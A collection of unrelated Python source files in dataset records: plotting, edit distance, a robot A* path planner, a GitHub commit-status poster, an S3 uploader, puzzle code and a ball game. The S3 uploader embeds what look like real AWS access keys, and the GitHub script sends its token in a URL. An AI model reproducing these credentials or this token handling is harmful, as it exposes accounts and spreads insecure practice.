newCalc.append(eval(\"t.t\"+threshhold+\"_d\"+str(i)))\n plt.figure()\n for i in range(len(newCalc)):\n plt.plot(newCalc[i])\n plt.yticks([0, 1], [\"nein\", \"ja\"])\n plt.title(\"Neue Umlegungen bei Threshhold \"+str(threshhold))\n plt.xlabel(\"Zeit [h]\")\n plt.ylabel(\"Neue Umlegung\")\n plt.legend(loc=\"upper left\")\n\n\nif __name__ == \"__main__\":\n # plotFahrzeugerzeugung(str(100), [12, 14, 16, 32, 34, 36, 64, 66], 0, 20)\n # plotRoutenplanung(str(300), str(2), [-68, -67, -35, -15, 15, 35, 67, 68], 0, 20, 15)\n # plotRoutenplanung2(\"ohne\", [2, 3, -5, 9], 0, 20, 15)\n # plotRoutenplanung2(\"mit\", [2, 3, -5, 6, 7, -8, 9], 0, 20, 15)\n # plotThreshhold(str(10), 0, 20)\n plt.show()\n","sub_path":"PythonProject/Auswertung.py","file_name":"Auswertung.py","file_ext":"py","file_size_in_byte":6894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"583516600","text":"\"\"\"Given two words word1 and word2, find the minimum number of operations required to convert\nword1 to word2.\n\nYou have the following 3 operations permitted on a word:\n\nInsert a character\nDelete a character\nReplace a character\nExample 1:\n\nInput: word1 = \"horse\", word2 = \"ros\"\nOutput: 3\nExplanation:\nhorse -> rorse (replace 'h' with 'r')\nrorse -> rose (remove 'r')\nrose -> ros (remove 'e')\nExample 2:\n\nInput: word1 = \"intention\", word2 = \"execution\"\nOutput: 5\nExplanation:\nintention -> inention (remove 't')\ninention -> enention (replace 'i' with 'e')\nenention -> exention (replace 'n' with 'x')\nexention -> exection (replace 'n' with 'c')\nexection -> execution (insert 'u')\n\"\"\"\n\n\nclass Solution:\n def minDistance(self, word1, word2):\n \"\"\"\n :type word1: str\n :type word2: str\n :rtype: int\n \"\"\"\n if not word1:\n return len(word2)\n\n if not word2:\n return len(word1)\n\n d = [[0] * (len(word2) + 1) for _ in range(len(word1) + 1)]\n\n for i in range(1, len(word1) + 1):\n d[i][0] = i\n\n for i in range(1, len(word2) + 1):\n d[0][i] = i\n\n for i in range(1, len(word1) + 1):\n for j in range(1, len(word2) + 1):\n weight = 1 if word1[i - 1] != word2[j - 1] else 0\n d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + weight)\n\n return d[-1][-1]\n\n\ninps = [\n ('horse', 'ros', 3),\n ('intention', 'execution', 5),\n ('1abcdef1', 'abcdef', 2),\n ('a', 'b', 1),\n]\n\nsol = Solution()\nfor w1, w2, exp in inps:\n print(f\"Finding min distance between {w1} and {w2} and asserting...\")\n ans = sol.minDistance(w1, w2)\n print(f\" Got: {ans}\")\n # assert ans == exp\n","sub_path":"python/leetcode_questions/edit_distance.py","file_name":"edit_distance.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"245210159","text":"import random\nimport time\nimport numpy as np\nimport signal\nfrom src.utils.data_objects.high_level_trajectory import HLTrajectory\nfrom src.utils.graph_search_utils.astar_fibheap import AStar\nfrom src.utils.logger import Logger\n\nfrom src.generators.generator_superclass import GeneratorSuperclass\nfrom src.utils.math_utils import MathUtils\nfrom src.utils import project_constants\n\n\nclass HighLevelTrajectoryPlanner(GeneratorSuperclass, AStar):\n\n '''State = (x, y, yaw, (x_prev, y_prev, yaw_prev), (x_2ndprev, y_2ndprev, yaw_2ndprev))\n '''\n\n def __init__(self, height_map, fs_cost_map, xy_yaw0, xy_yawf, rposer=None):\n\n self.start_state = (xy_yaw0[0],xy_yaw0[1],xy_yaw0[2],(None,None,None),(None,None,None))\n self.hl_traj_astar_search = None\n self.xy_yawf = xy_yawf\n self.xy_yaw0 = xy_yaw0\n self.straight_path_yaw_rad = np.arctan2(self.xy_yawf[1]-self.xy_yaw0[1],self.xy_yawf[0]-self.xy_yaw0[0])\n self.fs_cost_map = fs_cost_map\n self.height_map = height_map\n\n self.vis_successor = project_constants.STEPSEQ_VISUALIZE_SUCCESSOR\n self.rposer = rposer\n\n self.directions = [\n [1.0, 1.0, 1.0],\n [1.0, 1.0, 0.0],\n [1.0, 1.0, -1.0],\n [1.0, 0, 1.0],\n [1.0, 0, 0.0],\n [1.0, 0, -1.0],\n [1.0, -1.0, 1.0],\n [1.0, -1.0, 0.0],\n [1.0, -1.0, -1.0],\n [0, 1.0, 1.0],\n [0, 1.0, 0.0],\n [0, 1.0, -1.0],\n [0, 0, 1.0],\n # [0, 0, 0.0],\n [0, 0, -1.0],\n [0, -1.0, 1.0],\n [0, -1.0, 0.0],\n [0, -1.0, -1.0],\n [-1.0, 1.0, 1.0],\n [-1.0, 1.0, 0.0],\n [-1.0, 1.0, -1.0],\n [-1.0, 0, 1.0],\n [-1.0, 0, 0.0],\n [-1.0, 0, -1.0],\n [-1.0, -1.0, 1.0],\n [-1.0, -1.0, 0.0],\n [-1.0, -1, -1]\n ]\n\n self.end_effector_x = project_constants.BASE_STATE_END_EFF_DX_FROM_TORSO\n self.end_effector_y = project_constants.BASE_STATE_END_EFF_DY_FROM_TORSO\n self.base_theta = np.arctan(self.end_effector_y / self.end_effector_x)\n self.xy_yaw_costs = {}\n self.decimal_round = 5\n GeneratorSuperclass.__init__(self, height_map)\n\n # Astar Search variables\n self.visited_state_nodes = {}\n self.g_weight = None\n self.h_weight = None\n # self.iterations = 0\n self.t_start = -1\n self.save_search_weights()\n self.xy_yaw_path = []\n self.smoothed_path = None\n\n AStar.__init__(self,state=self.start_state)\n\n self.inbounds_error = False\n if self.get_cost(xy_yawf[0], xy_yawf[1], xy_yawf[2]) > 10:\n Logger.log(\"Error: robot xy yaw_f is out of bounds\", color=\"FAIL\", class_id=1, msg_type=1)\n self.inbounds_error = True\n\n def save_search_weights(self, debug=False):\n self.g_weight = project_constants.HLTRAJ_G_WEIGHT\n self.h_weight = project_constants.HLTRAJ_H_WEIGHT\n\n if project_constants.STEPSEQ_VERBOSITY >= 3:\n print(\"g weight:\",Logger.pp_double(self.g_weight),\", h_weight:\",Logger.pp_double(self.h_weight))\n\n def build_trajectory(self, suspend_after=None, save_high_density_xy_yaw_path=True, save_smoothed_path=True):\n '''\n returns runtime, -1 if doesn't complete after suspend_after seconds, -2 if inbounds error\n '''\n\n hl_traj = HLTrajectory()\n hl_traj.xy_yaw0 = self.xy_yaw0[:]\n hl_traj.xy_yawf = self.xy_yawf[:]\n\n if self.inbounds_error:\n Logger.log(\"Error: robot xy yaw_f is out of bounds\", \"FAIL\", class_id=1, msg_type=1)\n return -2\n\n t_start = time.time()\n if project_constants.STEPSEQ_VERBOSITY >= 2:\n print(\"Starting high level trajectory search\")\n\n if suspend_after:\n\n def handler(signum, frame):\n raise Exception(\"End of time\")\n\n signal.signal(signal.SIGALRM, handler)\n signal.alarm(suspend_after)\n\n self.t_start = time.time()\n self.search()\n try:\n self.search()\n except Exception as e:\n if project_constants.STEPSEQ_VERBOSITY >= 1:\n Logger.log(f\"Failed to build a path after {round(suspend_after), 2} seconds\", \"FAIL\")\n return -1\n\n else:\n self.search()\n\n if suspend_after: signal.alarm(0)\n\n path = self.result_path()\n\n if project_constants.STEPSEQ_VERBOSITY >= 2:\n print(\"High level trajectory search finished in:\",time.time() - t_start, \"s\")\n\n state_path = []\n for node in path:\n state_path.append(node.state)\n state_path = state_path[:-1]\n for xy_yaw in state_path:\n self.xy_yaw_path.append([xy_yaw[0], xy_yaw[1], xy_yaw[2]])\n\n if save_smoothed_path:\n self.save_smoothed_path()\n\n if save_high_density_xy_yaw_path:\n self.save_high_density_xy_yaw_path()\n\n # Save results\n hl_traj.xy_yaw_path = self.xy_yaw_path[:]\n hl_traj.higher_density_xy_yaw_path = self.higher_density_xy_yaw_path[:]\n hl_traj.ave_higher_density_xy_yaw_path_distance_change = self.ave_higher_density_xy_yaw_path_distance_change\n hl_traj.ave_smooth_path_distance_change = self.ave_smooth_path_distance_change\n hl_traj.failed = False\n hl_traj.runtime = time.time() - t_start\n\n return hl_traj\n\n def return_trajectory(self):\n hl_traj = HLTrajectory()\n hl_traj.xy_yaw0 = self.xy_yaw0[:]\n hl_traj.xy_yawf = self.xy_yawf[:]\n hl_traj.xy_yaw_path = self.xy_yaw_path[:]\n hl_traj.higher_density_xy_yaw_path = self.higher_density_xy_yaw_path[:]\n hl_traj.ave_higher_density_xy_yaw_path_distance_change = self.ave_higher_density_xy_yaw_path_distance_change\n # hl_traj.smoothed_path = self.smoothed_path[:]\n hl_traj.ave_smooth_path_distance_change = self.ave_smooth_path_distance_change\n return hl_traj\n\n def save_high_density_xy_yaw_path(self):\n num_to_add_between_points = project_constants.HLTRAJ_NB_POINTS_BTWN_PATH_NODES\n extended_xy_yaw_path = MathUtils.list_extender(self.xy_yaw_path, num_to_add_between_points)\n self.higher_density_xy_yaw_path = extended_xy_yaw_path\n ave_dist = 0\n for i in range(0, len(extended_xy_yaw_path) - 2):\n xy_yaw1 = extended_xy_yaw_path[i]\n xy_yaw2 = extended_xy_yaw_path[i + 1]\n ave_dist += MathUtils._2d_euclidian_distance(xy_yaw1, xy_yaw2)\n ave_dist /= len(extended_xy_yaw_path)\n self.ave_higher_density_xy_yaw_path_distance_change = ave_dist\n\n def get_higher_density_xy_yaw_path(self):\n return self.higher_density_xy_yaw_path\n\n # --------------------- A* Functions\n def is_goal(self, state, debug=False):\n err_threshold = project_constants.HLTRAJ_GOAL_THRESHOLD\n dist = np.fabs(state[0]-self.xy_yawf[0])+ np.fabs(state[1]-self.xy_yawf[1])\n # if project_constants.STEPSEQ_VERBOSITY >= 3:\n # if dist < 1:\n # print(\"Dist for state:\", Logger.pp_list(state), \" to goal: \", Logger.pp_double(dist))\n return dist < err_threshold\n\n def successors(self, state):\n\n # stance = (x, y, yaw, (x_prev, y_prev, yaw_prev))\n # Aprox 1000 iterations/ 60s\n\n # self.iterations += 1\n successors, successor_costs = [],[]\n for direction in self.directions:\n x_new = self.round(state[0] + direction[0] * project_constants.HLTRAJ_DELTAX * np.cos(self.straight_path_yaw_rad))\n y_new = self.round(state[1] + direction[1] * project_constants.HLTRAJ_DELTAY * np.sin(self.straight_path_yaw_rad))\n yaw_new = self.round(state[2] + direction[2] * project_constants.HLTRAJ_YAW_OFFSET)\n\n # if state[3] is not None:\n # new_state = (x_new, y_new, yaw_new, (state[0], state[1], state[2]), (state[3][0], state[3][1], state[3][2]))\n # else:\n # new_state = (x_new, y_new, yaw_new, (state[0], state[1], state[2]), (None, None, None))\n\n new_state = (x_new, y_new, yaw_new, (state[0], state[1], state[2]))\n\n new_state_cost = self.g_weight * self.get_cost(new_state[0], new_state[1], new_state[2])\n\n successors.append(new_state)\n successor_costs.append(new_state_cost)\n\n # if self.debug:\n # if random.randint(0,1000)> 950:\n # node = self.visited_state_node(state)\n # # self.is_goal(state, debug=True)\n # # print \"\\n\\n current state:\",logger.pp_list(state),\"\\t cost to node (node.g):\",logger.pp_double(node.g),\" node.h weight:\",logger.pp_double(node.h),\" \\t total cost (f):\",logger.pp_double(node.f)\n #\n # # print \" parent state:\",logger.pp_list(parent_state\n # t_elapsed = time.time() - self.t_start\n # print \"\\n current state:\",logger.pp_list(state)\n # print \" iterations:\",self.iterations,\" t_elapsed:\",t_elapsed, \" hweight:\",logger.pp_double(self.h_weight)\n # # print \" path_yaw_est:\",logger.pp_double(path_yaw_est)\n # # print \" dist traveled (out of 1):\",i\n # # print\n # # for i in range(len(successors)):\n # # print \" cost:\",successor_costs[i],\"\\th:\",logger.pp_double(self.heuristic(successors[i])),\"\\tq:\",logger.pp_list(successors[i])\n\n if self.vis_successor:\n if random.randint(0,1000)>950:\n self.rposer.set_xyz_yaw(state[0], state[1], project_constants.TORSO_Z_DESIRED, np.deg2rad(state[2]))\n\n if project_constants.STEPSEQ_VERBOSITY >= 3:\n if random.randint(0,1000)> 950:\n node = self.visited_state_node(state)\n # self.is_goal(state, debug=True)\n print(f\"\\t q_xy: {Logger.pp_list(state[0:3])} \\t dist to goal: {round(np.sqrt( (state[0] - self.xy_yawf[0])**2 + (state[1]-self.xy_yawf[1])**2 ), 2)} \\t n.g: {Logger.pp_double(node.g)} \\t n.h: {Logger.pp_double(node.h) }\\tn.f: {Logger.pp_double(node.f)}\")\n\n # print \" parent state:\",logger.pp_list(parent_state\n # print \"\\n\\n current state:\",logger.pp_list(state)\n # print \" path_yaw_est:\",logger.pp_double(path_yaw_est)\n # print \" dist traveled (out of 1):\",i\n # print\n # for i in range(len(successors)): # type: int\n # print \" cost:\",successor_costs[i],\"\\th:\",logger.pp_double(self.heuristic(successors[i])),\"\\tq:\",logger.pp_list(successors[i])\n # time.sleep(2)\n\n return successors,successor_costs\n\n def clear_visited(self):\n self.visited_state_nodes.clear()\n\n def visit(self, state, node):\n self.visited_state_nodes[state] = node\n\n def visited_state_node(self, state):\n if state in self.visited_state_nodes:\n return self.visited_state_nodes[state]\n return None\n\n def heuristic(self, state):\n\n parent_state = state[3]\n # _2nd_parent_state = state[4]\n\n if parent_state == (None, None, None):\n path_yaw_est_deg = state[2] # just sets the yaw heuristic to 0\n else:\n path_yaw_est_deg = np.rad2deg(np.arctan2(state[1] - parent_state[1], state[0] - parent_state[0]))\n\n # total_dist = np.sqrt( (self.xy_yaw0[0] - self.xy_yawf[0])**2 + (self.xy_yaw0[1]-self.xy_yawf[1])**2 )\n xy_dist_to_goal = np.sqrt( (state[0] - self.xy_yawf[0])**2 + (state[1]-self.xy_yawf[1])**2 )\n dist_weight = 1.0\n # yaw_weight = 0.0\n yaw_weight = .001\n #\n # if xy_dist_to_goal / total_dist > .8:\n # yaw_weight = 0\n\n return self.h_weight * (dist_weight*xy_dist_to_goal + yaw_weight*np.abs(state[2]-path_yaw_est_deg))\n # return self.h_weight * (dist_weight*xy_dist_to_goal)\n\n # --------------------- Helper Functions\n \n def save_smoothed_path(self):\n\n if project_constants.STEPSEQ_VERBOSITY >= 3:\n for xy_yaw in self.xy_yaw_path:\n print(\" \",Logger.pp_list(xy_yaw))\n try:\n smoothed_path = MathUtils._3d_pointlist_cubic_interprolation(self.xy_yaw_path)\n except TypeError:\n Logger.log(\"Error: 'm > k must hold'\", \"FAIL\")\n smoothed_path = self.xy_yaw_path\n\n self.smoothed_path = smoothed_path\n ave_dist = 0\n for i in range(0, len(smoothed_path) - 2):\n xy_yaw1 = smoothed_path[i]\n xy_yaw2 = smoothed_path[i + 1]\n ave_dist += MathUtils._2d_euclidian_distance(xy_yaw1, xy_yaw2)\n ave_dist /= len(smoothed_path)\n self.ave_smooth_path_distance_change = ave_dist\n\n def get_cost(self, x, y, yaw, debug=False):\n\n x_margin = project_constants.SEARCH_SPACE_X_MARGIN\n y_margin = project_constants.SEARCH_SPACE_Y_MARGIN\n fl_base, fr_base, br_base, bl_base = self.get_end_affector_xyz_coords_from_xy_yaw_deg_at_base_state([x,y,yaw],debug=debug, with_x_margin=x_margin, with_y_margin=y_margin)\n\n # out of search area\n if not fl_base:\n return np.inf\n\n fl_x, fl_y = fl_base[0], fl_base[1]\n fr_x, fr_y = fr_base[0], fr_base[1]\n bl_x, bl_y = bl_base[0], bl_base[1]\n br_x, br_y = br_base[0], br_base[1]\n\n r = .1\n\n # fl_cost = self.fs_cost_map.cost_at_xy(fl_x, fl_y)\n # fr_cost = self.fs_cost_map.cost_at_xy(fr_x, fr_y)\n # bl_cost = self.fs_cost_map.cost_at_xy(bl_x, bl_y)\n # br_cost = self.fs_cost_map.cost_at_xy(br_x, br_y)\n fl_cost = self.fs_cost_map.min_cost_in_circle_about_xy(fl_x, fl_y, r)\n fr_cost = self.fs_cost_map.min_cost_in_circle_about_xy(fr_x, fr_y, r)\n bl_cost = self.fs_cost_map.min_cost_in_circle_about_xy(bl_x, bl_y, r)\n br_cost = self.fs_cost_map.min_cost_in_circle_about_xy(br_x, br_y, r)\n cost = fl_cost + fr_cost + bl_cost + br_cost\n\n return cost\n\n def dist_between_xy_yaws(self, q1, q2, yaw_err_coeff=None):\n x_scaler = 1\n y_scaler = 1\n yaw_scaler = 1.0/25.0\n if yaw_err_coeff:\n yaw_scaler *= yaw_err_coeff\n return np.sqrt( x_scaler*(q1[0] - q2[0])**2 + y_scaler*(q1[1] - q2[1])**2 + yaw_scaler*(q1[2] - q2[2])**2 )\n\n def round(self,n):\n return np.round(n,decimals=self.decimal_round)","sub_path":"src/generators/high_level_trajectory_generator.py","file_name":"high_level_trajectory_generator.py","file_ext":"py","file_size_in_byte":14498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"477640662","text":"#!/usr/bin/python\nimport requests\nimport os\nimport json\nimport argparse\n\n\ndef post_github_commit_status(commit_sha, state, repo, user, token,\n target_url):\n build_number = os.environ.get('CIRCLE_BUILD_NUMBER')\n if build_number:\n target_url += \"/{}\".format(build_number)\n data = {\"state\": state,\n \"context\": \"paperg/integration\",\n \"description\": \"paperg/integration: \" + state,\n \"target_url\": target_url}\n data_json = json.dumps(data)\n headers = {'Content-Type': 'application/json'}\n url = \"https://api.github.com/repos/{}/{}/statuses/{}?access_token={}\".format(\n user, repo, commit_sha, token)\n\n response = requests.post(url, data=data_json, headers=headers)\n print(\"Posting commit status={} for {}/{}/{} got response:\\n{}\".format(\n state, user, repo, commit_sha, response.content))\n return response\n\n\ndef __parse_args():\n argparser = argparse.ArgumentParser()\n\n argparser.add_argument('-s', '--state', required=True, default=None,\n help='State: [success | failure | pending ]')\n argparser.add_argument('-t', '--target-url',\n default=os.environ.get('CINDERBLOCK_TARGET_URL'),\n help='target_url for the commit status')\n argparser.add_argument('-u', '--user',\n default=os.environ.get('CINDERBLOCK_GITHUB_USER'),\n help='The GitHub user to send commitstatus to')\n argparser.add_argument('-T', '--token',\n default=os.environ.get('CINDERBLOCK_GITHUB_TOKEN'),\n help='GitHub API token')\n argparser.add_argument('-c', '--commit', default=os.environ.get('CINDERBLOCK_SHA'),\n help='The git commit SHA to post status to')\n argparser.add_argument('-r', '--repo',\n default=os.environ.get('CINDERBLOCK_PROJECT_NAME'),\n help='The GitHub repo')\n args = argparser.parse_args()\n assert args.target_url, \"target-url missing or CINDERBLOCK_TARGET_URL is not set!\"\n assert args.token, \"github token missing or CINDERBLOCK_GITHUB_TOKEN is not set!\"\n assert args.user, \"github user missing or CINDERBLOCK_GITHUB_USER is not set!\"\n assert args.commit, \"commit missing or CINDERBLOCK_SHA is not set!\"\n assert args.repo, \"repo missing or CINDERBLOCK_PROJECT_NAME is not set!\"\n return args\n\n\nif __name__ == '__main__':\n args = __parse_args()\n post_github_commit_status(commit_sha=args.commit, state=args.state,\n repo=args.repo, user=args.user, token=args.token,\n target_url=args.target_url)\n","sub_path":"cinderblock/commitstatus.py","file_name":"commitstatus.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"303475320","text":"import boto3\nimport os\n\nclass Settings:\n def __init__(self):\n self.input_path = \"/home/pi/Desktop/picture/\"\n self.stored_names = os.listdir(self.input_path)\n self.my_bucket = \"hyeonghakbucket\"\n self.s3 = boto3.client(\n 's3', # 사용할 서비스 이름, ec2이면 'ec2', s3이면 's3', dynamodb이면 'dynamodb'\n aws_access_key_id=\"AKIA27VRBCJZH7CEXQZM\", # 액세스 ID\n aws_secret_access_key=\"62DOftgv9nJfGE0R93dnT5Yk6NRHAu+f0cw21wqA\") # 비밀 엑세스 키\n\ndef file_upload():\n settings = Settings()\n file = None\n for name in settings.stored_names:\n file = settings.input_path + name\n print(file)\n settings.s3.upload_file(file, settings.my_bucket, name)\n\n","sub_path":"aws/aws_fileupload.py","file_name":"aws_fileupload.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"328491108","text":"from itertools import product\nfrom collections import Counter\n\nA = []\nfor _ in range(9) :\n A.append([i for i in range(1, 5)])\npeter_possibilites = [] \nfor p in product(*A) :\n peter_possibilites.append(sum(p))\nC_peter_possibilites = Counter(peter_possibilites) \n\n\nB = []\nfor _ in range(6) :\n B.append([i for i in range(1, 7)])\ncolin_possibilites = [] \nfor p in product(*B) :\n colin_possibilites.append(sum(p))\n\nC_colin_possibilites = Counter(colin_possibilites)\n\n\npeter_wins = 0\nfor (k_p, v_p) in C_peter_possibilites.items() :\n for (k_c, v_c) in C_colin_possibilites.items() :\n if k_p > k_c :\n peter_wins += v_p * v_c\n \na = 6**6 * 4 **9\n \nprint(format(peter_wins/a, '.7f'))\n\n\n","sub_path":"projectEuler_p205.py","file_name":"projectEuler_p205.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"140318888","text":"#------------------------------\n# Name: Esercizio 3.9\n# Authors: Montali Simone, Riccardo Fava\n#------------------------------\n\nimport game2d\nimport random\nARENA_W=500\nARENA_H=500\n\ndef keydown(code: str):\n global balls\n print(code)\n if (code==\"ArrowLeft\"):\n balls[0].go_left()\n elif (code==\"ArrowRight\"):\n balls[0].go_right()\n if(code==\"Space\"):\n balls[0].jump()\n\n\ndef keyup(code: str):\n global balls\n if (code==\"ArrowLeft\" or code == \"ArrowRight\"):\n balls[0].stay()\n\n\n\n\n\n\nclass Ball:\n\n def __init__(self, x, y, weight) :\n self._x = x\n self._y = y\n self._weight=weight\n self._dx = 0\n self._dy = 0 #Simuliamo un peso pallina da 10 a 40\n self._w = 20\n self._h = 20\n self._g = 0.4\n self._color = (random.randint(0,255),random.randint(0,255),random.randint(0,255))\n\n def move(self):\n self._x += self._dx\n if ((self._x)>(ARENA_W+self._w)):\n self._x=self._w\n if((self._w+self._x)<0):\n self._x=(ARENA_W+self._w)\n self._dy+=self._g\n self._y += self._dy\n if (self._y>=(ARENA_H-self._h)):\n self._y=(ARENA_H-self._h)\n\n def rect(self) -> (int, int, int, int):\n return self._x, self._y, self._w, self._h\n\n def update (self):\n self.move()\n self.draw()\n print(self._dx)\n\n def draw(self):\n game2d.draw_circle(self._color,(self._x,self._y),self._w)\n\n def go_left (self):\n print(\"left\" )\n self._dx=-5\n\n def go_right (self):\n self._dx=5\n\n def stay (self):\n self._dx=0\n\n def jump (self):\n if(self._y==(ARENA_H-self._h)):\n self._dy=-15\n\ndef updateall ():\n game2d.canvas_fill((255, 255, 255))\n for b in balls:\n b.update()\n\ngame2d.canvas_init((ARENA_W,ARENA_H))\nballs=[]\nballs.append(Ball(random.randint(0, ARENA_W),random.randint(0,ARENA_H),random.randint(10,40)))\n\ngame2d.handle_keyboard(keydown,keyup)\ngame2d.set_interval(updateall,1000//30)\n","sub_path":"ese3.9.py","file_name":"ese3.9.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"649275328","text":"'''\nCreated on Apr 12, 2012\n\n@package: gateway service\n@copyright: 2011 Sourcefabric o.p.s.\n@license: http://www.gnu.org/licenses/gpl-3.0.txt\n@author: Gabriel Nistor\n\nProvides the gateway repository processor.\n'''\n\nfrom ally.container.ioc import injected\nfrom ally.design.processor.attribute import defines, requires\nfrom ally.design.processor.context import Context\nfrom ally.design.processor.handler import HandlerProcessor\nfrom ally.gateway.http.spec.gateway import IRepository, RepositoryJoined\nfrom ally.http.spec.codes import BAD_GATEWAY, CodedHTTP\nfrom ally.http.spec.server import HTTP_OPTIONS\nfrom ally.support.http.request import RequesterGetJSON\nfrom sched import scheduler\nfrom threading import Thread\nimport logging\nimport re\nimport time\n\n# --------------------------------------------------------------------\n\nlog = logging.getLogger(__name__)\n\n# --------------------------------------------------------------------\n\nclass GatewayRepository(Context):\n '''\n The gateway context based on @see: gateway-http/gateway.http.gateway\n '''\n # ---------------------------------------------------------------- Defined\n filters = defines(dict, doc='''\n @rtype: dictionary{integer: list[string]}\n Contains a dictionary of filter URIs indexed by the represented group. @see: Gateway.Filters.\n ''')\n# host = defines(str, doc='''\n# @rtype: string\n# The host where the request needs to be resolved, if not provided the request will be delegated to the\n# default host.\n# ''')\n# protocol = defines(str, doc='''\n# @rtype: string\n# The protocol to be used in the communication with the server that handles the request, if not provided\n# the request will be delegated using the default protocol.\n# ''')\n navigate = defines(str, doc='''\n @rtype: string\n A pattern like string of forms like '*', 'resources/*' or 'redirect/Model/{1}'. The pattern is allowed to\n have place holders and also the '*' which stands for the actual called URI, also parameters are allowed\n for navigate URI, the parameters will be appended to the actual parameters.\n ''')\n putHeaders = defines(dict, doc='''\n @rtype: dictionary{string: string}\n The headers to be put on the forwarded requests.\n ''')\n\nclass MatchRepository(Context):\n '''\n The match context.\n '''\n # ---------------------------------------------------------------- Defined\n gateway = defines(Context, doc='''\n @rtype: Context\n The matched gateway.\n ''')\n groupsURI = defines(tuple, doc='''\n @rtype: tuple(string)\n The match groups for the URI.\n ''')\n\nclass Request(Context):\n '''\n The request context.\n '''\n # ---------------------------------------------------------------- Defined\n repository = defines(IRepository, doc='''\n @rtype: IRepository\n The repository to be used for finding matches.\n ''')\n # ---------------------------------------------------------------- Required\n clientIP = requires(str)\n \nclass Response(CodedHTTP):\n '''\n The response context.\n '''\n # ---------------------------------------------------------------- Defined\n text = defines(str)\n\n# --------------------------------------------------------------------\n\n@injected\nclass GatewayRepositoryHandler(HandlerProcessor):\n '''\n Implementation for a handler that provides the gateway repository by using REST data received from either internal or\n external server. The Gateway structure is defined as in the @see: gateway-http plugin.\n '''\n \n uri = str\n # The URI used in fetching the gateways.\n cleanupInterval = float\n # The number of seconds to perform clean up for cached gateways.\n requesterGetJSON = RequesterGetJSON\n # The requester for getting the JSON gateway objects.\n \n def __init__(self):\n assert isinstance(self.uri, str), 'Invalid URI %s' % self.uri\n assert isinstance(self.cleanupInterval, int), 'Invalid cleanup interval %s' % self.cleanupInterval\n assert isinstance(self.requesterGetJSON, RequesterGetJSON), 'Invalid requester JSON %s' % self.requesterGetJSON\n super().__init__()\n self.initialize()\n\n def process(self, chain, request:Request, response:Response, Gateway:GatewayRepository, Match:MatchRepository, **keyargs):\n '''\n @see: HandlerProcessor.process\n \n Obtains the repository.\n '''\n assert isinstance(request, Request), 'Invalid request %s' % request\n assert isinstance(response, Response), 'Invalid response %s' % response\n assert issubclass(Gateway, GatewayRepository), 'Invalid gateway class %s' % Gateway\n assert issubclass(Match, MatchRepository), 'Invalid match class %s' % Match\n \n if self._identifiers is None:\n jobj, error = self.requesterGetJSON.request(self.uri, details=True)\n if jobj is None:\n BAD_GATEWAY.set(response)\n response.text = error.text\n return\n assert 'GatewayList' in jobj, 'Invalid objects %s, not GatewayList' % jobj\n self._identifiers = [self.populate(Identifier(Gateway()), obj) for obj in jobj['GatewayList']]\n \n repository = Repository(request.clientIP, self._identifiers, Match)\n if request.repository: request.repository = RepositoryJoined(request.repository, repository)\n else: request.repository = repository\n\n # ----------------------------------------------------------------\n \n def initialize(self):\n '''\n Initialize the repository.\n '''\n self._identifiers = None\n self.startCleanupThread('Cleanup gateways thread')\n \n def startCleanupThread(self, name):\n '''\n Starts the cleanup thread.\n \n @param name: string\n The name for the thread.\n '''\n schedule = scheduler(time.time, time.sleep)\n def executeCleanup():\n self.performCleanup()\n schedule.enter(self.cleanupInterval, 1, executeCleanup, ())\n schedule.enter(self.cleanupInterval, 1, executeCleanup, ())\n scheduleRunner = Thread(name=name, target=schedule.run)\n scheduleRunner.daemon = True\n scheduleRunner.start()\n\n def performCleanup(self):\n '''\n Performs the cleanup for gateways.\n '''\n self._identifiers = None\n \n # ----------------------------------------------------------------\n \n def populate(self, identifier, obj):\n '''\n Populates the gateway based on the provided dictionary object.\n @see: gateway-http/gateway.http.gateway\n \n @param identifier: Identifier\n The identifier object to populate.\n @param obj: dictionary{string: string|list[string]}\n The dictionary used for defining the gateway object, the object as is defined from response.\n @return: Identifier\n The populated identifier object.\n '''\n assert isinstance(identifier, Identifier), 'Invalid identifier %s' % identifier\n assert isinstance(obj, dict), 'Invalid object %s' % obj\n \n clients = obj.get('Clients')\n if clients:\n assert isinstance(clients, list), 'Invalid clients %s' % clients\n if __debug__:\n for client in clients: assert isinstance(client, str), 'Invalid client value %s' % client\n identifier.clients.extend(re.compile(client) for client in clients)\n \n pattern = obj.get('Pattern')\n if pattern:\n assert isinstance(pattern, str), 'Invalid pattern %s' % pattern\n identifier.pattern = re.compile(pattern)\n \n headers = obj.get('Headers')\n if headers:\n assert isinstance(headers, list), 'Invalid headers %s' % headers\n if __debug__:\n for header in headers: assert isinstance(header, str), 'Invalid header value %s' % header\n identifier.headers.extend(re.compile(header) for header in headers)\n \n methods = obj.get('Methods')\n if methods:\n assert isinstance(methods, list), 'Invalid methods %s' % methods\n if __debug__:\n for method in methods: assert isinstance(method, str), 'Invalid method value %s' % method\n identifier.methods.update(method.upper() for method in methods)\n \n errors = obj.get('Errors')\n if errors:\n assert isinstance(errors, list), 'Invalid errors %s' % errors\n for error in errors:\n try: identifier.errors.add(int(error))\n except ValueError: raise ValueError('Invalid error value \\'%s\\'' % error)\n \n gateway = identifier.gateway\n assert isinstance(gateway, GatewayRepository), 'Invalid gateway %s' % gateway\n \n filters = obj.get('Filters')\n if filters:\n assert isinstance(filters, list), 'Invalid filters %s' % filters\n gateway.filters = {}\n for item in filters:\n assert isinstance(item, str), 'Invalid filter value %s' % item\n assert ':' in item, 'Invalid filter item %s, has no group specified' % item\n group, path = item.split(':', 1)\n try: group = int(group)\n except ValueError: raise ValueError('Invalid group value \\'%s\\'' % group)\n paths = gateway.filters.get(group)\n if paths is None: paths = gateway.filters[group] = []\n paths.append(path)\n \n# gateway.host = obj.get('Host')\n# assert not 